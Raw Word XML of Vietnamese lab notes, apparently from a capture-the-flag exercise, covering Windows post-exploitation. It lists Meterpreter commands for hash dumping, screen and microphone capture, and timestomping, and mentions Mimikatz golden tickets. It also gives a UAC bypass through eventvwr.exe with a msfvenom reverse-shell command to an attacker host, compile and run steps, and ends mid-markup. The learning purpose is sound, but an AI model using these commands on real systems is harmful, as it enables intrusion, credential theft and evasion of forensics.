          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2704CF5D" w14:textId="7E93FC9F" w:rsidR="00CC724A" w:rsidRDefault="00CC724A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4F57CD" w14:textId="612C7CDB" w:rsidR="00CC724A" w:rsidRDefault="00CC724A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong khi tương tác với máy ảo sẽ hữu ích hơn, lệnh nào cho phép chúng ta xem màn hình của người dùng từ xa trong thời gian thực: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F3A8A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>screenshare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BEC4BD" w14:textId="2F4AA263" w:rsidR="00CC724A" w:rsidRDefault="00CC724A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu chúng ta muốn ghi âm từ micro gắn với hệ thống: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F3A8A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>record_mic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44841C" w14:textId="288CFF57" w:rsidR="00CC724A" w:rsidRDefault="00CC724A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442C65ED" w14:textId="2631431B" w:rsidR="00CC724A" w:rsidRPr="002F3A8A" w:rsidRDefault="00CC724A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Để các nỗ lực điều tra trở nên phức tạp hơn, chúng ta có thể điều chỉnh timestamps của tập tin trên hệ thống</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3A8A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: timestomp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE82C8A" w14:textId="77777777" w:rsidR="004E1A1E" w:rsidRDefault="004E1A1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C22899" w14:textId="480179C8" w:rsidR="00CC724A" w:rsidRDefault="00CC724A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đừng cố gắng làm điều đó trong quá trình kiểm thử nếu bạn không được phép làm! Điều này không có lợi cho đội phòng thủ khi họ cố gắng phân tích các sự kiện của cuộc tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9CAB7" w14:textId="3BD2BF40" w:rsidR="004E1A1E" w:rsidRDefault="004E1A1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFFBBF7" w14:textId="546BD89A" w:rsidR="004E1A1E" w:rsidRDefault="004E1A1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các cuộc tấn công golden ticket là 1 chức năng trong Mimikatz tận dụng 1 thành phần trong Kerberos (hệ thống xác thực trong Windows domains). Tóm lại, các cuộc tấn công golden ticket cho phép chúng ta duy trì tính bền vững và xác thực như bất kỳ người dùng nào trên miền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486176B8" w14:textId="5E144476" w:rsidR="004E1A1E" w:rsidRDefault="004E1A1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9357FB" w14:textId="385C3E2F" w:rsidR="004E1A1E" w:rsidRDefault="004E1A1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi chúng ta có mật khẩu của Dark, chúng ta có thể xác thực và truy cập máy ảo qua remote desktop (MSRDP). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CA5ABB" w14:textId="7F07809C" w:rsidR="00F757DF" w:rsidRDefault="00F757DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="398C992B" w14:textId="345DE97F" w:rsidR="00832616" w:rsidRPr="00832616" w:rsidRDefault="00832616">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00832616">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Manual Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D382DC" w14:textId="317336A9" w:rsidR="00832616" w:rsidRDefault="00832616">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kiểm tra đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C0B88A" w14:textId="7C7535C0" w:rsidR="00D0767D" w:rsidRDefault="00EF57EB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="451B4E70" wp14:editId="1DF79085">
            <wp:extent cx="5943600" cy="37249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24910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E44D075" w14:textId="2D9A8D70" w:rsidR="00D0767D" w:rsidRDefault="00832616">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta đang ở nhóm administrator và Medium Mandatory Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D30CFD7" w14:textId="41400CE8" w:rsidR="00832616" w:rsidRDefault="00832616">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kiểm tra UAC có thực thi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2CE14B" w14:textId="513BF7A6" w:rsidR="00D0767D" w:rsidRDefault="00EF57EB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A7D6556" wp14:editId="07E1CCA9">
            <wp:extent cx="5943600" cy="10833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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1083310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04986D35" w14:textId="5A2529E9" w:rsidR="00832616" w:rsidRDefault="00832616">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">EnableLUA cho chúng ta biết UAC có được bật không. Nếu 0 chúng ta không cần bypass nó. Ngược lại, kiểm tra keys 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00832616">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PromptSecureDesktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> được bật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5ACC7" w14:textId="60824607" w:rsidR="00832616" w:rsidRDefault="00832616">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C55E6D" w14:textId="3CFD5E89" w:rsidR="00832616" w:rsidRDefault="00832616">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đảm bảo eventvwr.exe tồn tại và đặt autoelevate</w:t>
      </w:r>
      <w:r w:rsidR="00BC5F95">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> có tính toàn vẹn cao</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D69FC1" w14:textId="71D5E8B7" w:rsidR="00EF3D7B" w:rsidRDefault="00EF3D7B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364DB848" w14:textId="74367CA6" w:rsidR="00EF3D7B" w:rsidRDefault="00A6733D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="005CEE98" wp14:editId="17326F96">
            <wp:extent cx="5943600" cy="12833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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1283335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6958EDEE" w14:textId="1421CDD1" w:rsidR="00C611E9" w:rsidRDefault="00C611E9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE183F2" w14:textId="45FAD37D" w:rsidR="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upload strings64.exe đến máy nạn nhân:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617FD49B" w14:textId="56DB8080" w:rsidR="00C611E9" w:rsidRDefault="00847445">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DDD9561" wp14:editId="4F9860A8">
            <wp:extent cx="5943600" cy="11068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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1106805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2C986" w14:textId="42904E3B" w:rsidR="00C611E9" w:rsidRDefault="003042B3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42E30974" wp14:editId="622D5431">
            <wp:extent cx="5943600" cy="7797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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="779780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="351615E2" w14:textId="2F675EAC" w:rsidR="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giá trị được đặt là True.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747CF958" w14:textId="038639B3" w:rsidR="00A53F33" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F602925" w14:textId="42CED8FE" w:rsidR="00A53F33" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tạo payload reverse shell bằng msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14676F27" w14:textId="5F1FEDB4" w:rsidR="00A53F33" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66EEF79E" w14:textId="3FE7639F" w:rsidR="00A53F33" w:rsidRPr="00BC5F95" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC5F95">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.55.1.48 LPORT=1234 -f exe &gt; shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE59DA2" w14:textId="45DD25A5" w:rsidR="00A53F33" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFA03F5" w14:textId="41A14288" w:rsidR="00A53F33" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nhớ tên của reverse shell chúng ta tạo là shell.exe. Nếu bạn đặt tên khác, phải thay đổi tên trong C script; shell.exe và eventvwr-bypassuac.c phải ở chung 1 thư mục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62822C54" w14:textId="36EB72F3" w:rsidR="00A53F33" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A5A55B" w14:textId="0BB39CF0" w:rsidR="00A53F33" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Biên dịch C script để khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049847D5" w14:textId="61086309" w:rsidR="00A53F33" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CC3400" w14:textId="1D58F31B" w:rsidR="00A53F33" w:rsidRPr="00BC5F95" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC5F95">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x86_64-w64-mingw32-gcc eventvwr-bypassuac.c -o eventvwr-bypassuac-64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78730921" w14:textId="70324247" w:rsidR="00A53F33" w:rsidRDefault="00A53F33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53259168" w14:textId="6117184B" w:rsidR="00A53F33" w:rsidRDefault="00B675B9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bây giờ upload shell.exe và eventvwr-bypassuac.exe đến máy nạn nhân </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0BE304" w14:textId="3910EE44" w:rsidR="00B675B9" w:rsidRDefault="00B675B9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59916A10" w14:textId="2BA7C520" w:rsidR="00B675B9" w:rsidRDefault="00B675B9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7519A1C1" wp14:editId="6EA871A0">
            <wp:extent cx="4502552" cy="22368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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4516224" cy="2243637"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C2612F" w14:textId="77777777" w:rsidR="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4231E4" w14:textId="341722E4" w:rsidR="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Thực thi script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A25500" w14:textId="77777777" w:rsidR="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6908EFFA" w14:textId="4CA3C87A" w:rsidR="00BC5F95" w:rsidRPr="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC5F95">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.\eventvwr-bypassuac-64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424EC451" w14:textId="62CE22A7" w:rsidR="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19144899" w14:textId="082DC01E" w:rsidR="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E30040E" w14:textId="73188006" w:rsidR="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF45873" w14:textId="45D11652" w:rsidR="00BC5F95" w:rsidRPr="00BC5F95" w:rsidRDefault="00BC5F95">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC5F95">
